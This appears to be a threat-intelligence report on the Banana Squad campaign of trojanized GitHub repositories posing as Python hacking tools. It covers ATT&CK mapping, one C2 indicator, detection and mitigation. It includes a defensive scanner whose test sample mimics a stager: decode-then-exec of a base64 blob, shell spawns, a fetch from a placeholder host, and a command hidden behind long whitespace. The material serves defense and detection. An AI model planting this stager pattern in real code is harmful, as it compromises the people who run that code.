Full Report
Cybersecurity researchers have uncovered a new campaign in which the threat actors have published more than 67 GitHub repositories that claim to offer Python-based hacking tools, but deliver trojanized payloads instead. The activity, codenamed Banana Squad by ReversingLabs, is assessed to be a continuation of a rogue Python campaign that was identified in 2023 as targeting the Python Package
Analysis Summary
# Tool/Technique: Trojanized GitHub Repository Payloads (Banana Squad Campaign)
## Overview
This technique involves threat actors publishing malicious code disguised as legitimate, desirable Python-based hacking tools or game cheats on public source code repositories like GitHub. The primary purpose is to lure developers, gamers, or novice cybercriminals into cloning or downloading the repositories, resulting in the execution of trojanized payloads (backdoors and stealers) on their systems. This represents a large-scale software supply chain attack vector targeting the open-source developer ecosystem.
## Technical Details
- Type: Technique (Malware Distribution/Trojanizing)
- Platform: Developers and users who clone and run Python code from GitHub. Python itself is cross-platform, so the lure is not tied to one OS; the related campaigns and second-stage payloads named in the source (Visual Studio PreBuild events, screensaver files, AsyncRAT, Remcos RAT, Lumma Stealer) point to Windows victims.
- Capabilities: Delivering backdoors, information stealers, and potentially other RATs through trojanized repository contents.
- First Seen: ReversingLabs assesses the activity as a continuation of a rogue Python campaign first identified in 2023; the Banana Squad codename applies to the current wave of more than 67 repositories.
## MITRE ATT&CK Mapping
This activity spans multiple tactics. The actor publishes malware in repositories it controls rather than breaking into GitHub, so the fitting mappings are resource development (staging the repositories) followed by a supply chain lure and user execution; T1583.001 (Acquire Infrastructure: Domains) in the earlier draft of this mapping was the wrong identifier.
- **TA0042 - Resource Development**
- T1608.001 - Stage Capabilities: Upload Malware (publishing the trojanized repositories)
- **TA0001 - Initial Access**
- T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain (victims pull code from a source they treat as trusted)
- **TA0002 - Execution**
- T1204.002 - User Execution: Malicious File (the victim builds or runs the cloned "tool")
- T1059.006 - Command and Scripting Interpreter: Python
- **TA0011 - Command and Control**
- T1071.001 - Application Layer Protocol: Web Protocols (C2 communication)
- **TA0010 - Exfiltration**
- T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- **Impersonation:** More than 67 GitHub repositories posing as working tools of the kind their audience wants (a Discord account cleaner, a Fortnite external cheat, a TikTok username checker).
- **Baiting:** Targeting users searching for game cheats, account checkers, and hacking utilities, an audience inclined to run unreviewed code.
- **Payload Delivery:** The repository contents are trojanized, so the victim receives malicious code in place of, or alongside, the advertised tool.
### Advanced Features
- **Payload Diversity (Based on linked context):** Previous related campaigns utilized payloads embedded in various components:
- Visual Studio PreBuild events (111 instances noted in a linked campaign).
- Python scripts.
- Screensaver files.
- JavaScript.
- **Staging/Secondary Payloads:** Delivery of second-stage malware; the related Sakura-RAT repository infections cited in the source dropped AsyncRAT, Remcos RAT, and Lumma Stealer.
- **Data Theft:** Capabilities include stealing credentials, browser data, session tokens, and general sensitive data.
- **Remote Access:** Providing persistent remote access (RAT functionality).
## Indicators of Compromise
*Note: the source gives no hashes or file paths for the current 67 repositories, only the overall scope and one C2 domain associated with a previously reported, similar tool.*
- File Hashes: [Not explicitly provided for the new 67 repos]
- File Names: [Varies based on the decoy tool name]
- Registry Keys: [Not specified]
- Network Indicators: **dieserbenni[.]ru** (Associated C2 from a previously reported, similar tool).
- Behavioral Indicators: A cloned "tool" that fails to build, or that does something other than what its README claims when built or run; child processes (shell, Python interpreter) or outbound connections spawned by build steps such as Visual Studio PreBuild events or by the first run of the tool.
## Associated Threat Actors
- **Banana Squad:** Codename given by ReversingLabs for this specific wave of activity.
- **Unspecified Actors:** The activity is part of a wider trend of supply chain attacks that use GitHub as the distribution channel; the source links it to Water Curse, the Stargazers Ghost Network operators, and actors running Distribution-as-a-Service (DaaS) operations.
## Detection Methods
- Signature-based detection: AV/EDR signatures for the known second-stage payloads (AsyncRAT, Remcos RAT, Lumma Stealer) catch the activity once that stage executes, but not the trojanized repository contents themselves, which vary with each decoy.
- Behavioral detection: Monitoring for unusual process activity originating from development environments, e.g. Python scripts executing shell commands, or network connections initiated by build processes such as Visual Studio PreBuild events.
- YARA rules: Rules over the checked-out repository tree for known malicious components or for obfuscation patterns in Python files (for example encoded blobs passed to exec/eval, or decode-then-execute chains) can catch the first stage before it runs.
## Mitigation Strategies
- Prevention steps emphasized by researchers: Developers must **double-check** that a repository actually contains what it claims to, by reading the code before building or running it.
- **Source Verification:** Verify the provenance of open-source code, especially tools promising cheats or powerful utilities; a repository's star count or a polished README is not evidence of legitimacy.
- **Dependency Scanning:** Software composition analysis (SCA) flags known-bad packages that a cloned project pulls in, but not malicious code in the repository itself; pair it with a static review of the checkout.
- **Least Privilege:** Ensure development environments execute code under the least privilege necessary to prevent initial stage malware from escalating privileges or accessing sensitive data.
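The "double-check what the repository actually does" step above, and the Python-file heuristics listed under Detection Methods, can both be turned into a pre-run static triage of a checkout. The script below is an added example, not code from the ReversingLabs report or from the campaign; its watch-list of callees, the 200-character line threshold, and the constructed sample (the `check_username`/`_init` names, the placeholder URL) are assumptions for illustration rather than indicators from the source. It resolves import aliases so `import subprocess as sp` does not hide `sp.Popen`, and it tracks variables assigned from decode or download calls so that `exec(blob)` two lines later is reported as a stager rather than a plain `exec`.

```python
"""Static triage of Python source pulled from an untrusted repository (added example,
not code from the ReversingLabs report; the markers below are assumed, generic trojan
heuristics, not the campaign's exact indicators)."""
import ast, base64, binascii
from collections import namedtuple

# fully qualified callee -> category (assumed watch-list; extend as needed)
SUSPICIOUS_CALLS = {
    "exec": "dynamic-exec", "eval": "dynamic-exec",
    "base64.b64decode": "decode", "zlib.decompress": "decode", "marshal.loads": "decode",
    "urllib.request.urlopen": "network", "requests.get": "network", "socket.socket": "network",
    "subprocess.Popen": "shell", "subprocess.run": "shell", "subprocess.call": "shell",
    "os.system": "shell", "os.popen": "shell",
}
MAX_LINE_LEN = 200  # assumed threshold; code parked past the editor's right edge exceeds it
Finding = namedtuple("Finding", "path line category detail")


def _dotted_name(node):
    # 'a.b.c' for a Name/Attribute chain, else None
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    return ".".join(reversed(parts + [node.id])) if isinstance(node, ast.Name) else None


class _Scanner(ast.NodeVisitor):
    def __init__(self, path):
        self.path, self.findings = path, []
        self.aliases = {}     # local name -> fully qualified import target
        self.tainted = set()  # variables assigned from decode/network calls

    def visit_Import(self, node):
        self.aliases.update({a.asname: a.name for a in node.names if a.asname})

    def visit_ImportFrom(self, node):
        if node.module:
            self.aliases.update({a.asname or a.name: f"{node.module}.{a.name}" for a in node.names})

    def _category(self, func):
        """Undo `import x as y` / `from x import y as z`, then look the callee up."""
        dotted = _dotted_name(func)
        if dotted is None:
            return None, None
        head, _, rest = dotted.partition(".")
        head = self.aliases.get(head, head)
        qual = f"{head}.{rest}" if rest else head
        return SUSPICIOUS_CALLS.get(qual), qual

    def _fed_by_payload(self, call):
        """True if an argument is a tainted variable or wraps a decode/network call."""
        for sub in (n for arg in call.args for n in ast.walk(arg)):
            if isinstance(sub, ast.Name) and sub.id in self.tainted:
                return True
            if isinstance(sub, ast.Call) and self._category(sub.func)[0] in ("decode", "network"):
                return True
        return False

    def visit_Assign(self, node):
        if isinstance(node.value, ast.Call) and self._category(node.value.func)[0] in ("decode", "network"):
            self.tainted.update(t.id for t in node.targets if isinstance(t, ast.Name))
        self.generic_visit(node)

    def visit_Call(self, node):
        cat, qual = self._category(node.func)
        if cat == "dynamic-exec" and self._fed_by_payload(node):
            cat = "staged-payload"  # exec/eval of decoded or downloaded bytes: the stager shape
        if cat:
            self.findings.append(Finding(self.path, node.lineno, cat, qual))
        self.generic_visit(node)


def scan_source(source, path="<memory>"):
    """Flag over-long lines, then walk the AST; a file that will not parse is itself a finding."""
    findings = [Finding(path, i, "long-line", f"{len(line)} chars")
                for i, line in enumerate(source.splitlines(), 1) if len(line) > MAX_LINE_LEN]
    try:
        tree = ast.parse(source, filename=path)
    except SyntaxError as e:
        return findings + [Finding(path, e.lineno or 0, "unparseable", e.msg)]
    scanner = _Scanner(path)
    scanner.visit(tree)
    return findings + scanner.findings


# Constructed sample mimicking a trojanized "username checker": one working decoy
# function plus a hidden stager. The URL is a placeholder, not a real indicator.
_BLOB = base64.b64encode(b"import os; os.system('whoami'); print('ok')").decode()
SAMPLE = (
    "import base64 as b64, subprocess as sp\nimport urllib.request\n\n"
    "def check_username(name):\n    return len(name) >= 3\n\n"
    "def _init():\n"
    f'    blob = b64.b64decode("{_BLOB}")\n'
    "    exec(blob)\n"
    '    sp.Popen(["cmd", "/c", "whoami"])\n'
    '    urllib.request.urlopen("http://example.invalid/p")\n'
    '    note = "ok"' + " " * 250 + '; sp.call("whoami", shell=True)\n'
)
```

Run `scan_source(SAMPLE)` and the decoy function produces nothing while the `_init` body yields one finding per line: the decode, the `exec` reported as `staged-payload` because its argument was assigned from that decode, the two shell spawns, the outbound `urlopen`, and a `long-line` hit for the statement hidden after 250 spaces. To triage a whole checkout, feed every `Path(checkout).rglob("*.py")` file through `scan_source` before anything in it is built or run; a non-empty result on a "tool" that advertises no networking or shell behaviour is exactly the mismatch the mitigation above asks developers to look for.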
## Related Tools/Techniques
- Rogue Python campaigns targeting the PyPI repository (mentioned as the predecessor).
- **Stargazers Ghost Network:** A network of fake GitHub accounts that star, fork and follow malicious repositories so they look popular and trustworthy in search results.
- Sakura-RAT repository infections (delivering AsyncRAT, Remcos RAT, Lumma Stealer).
- **Distribution-as-a-Service (DaaS) Operations:** Large-scale operations utilizing compromised GitHub accounts to distribute malware embedded in trojanized repositories.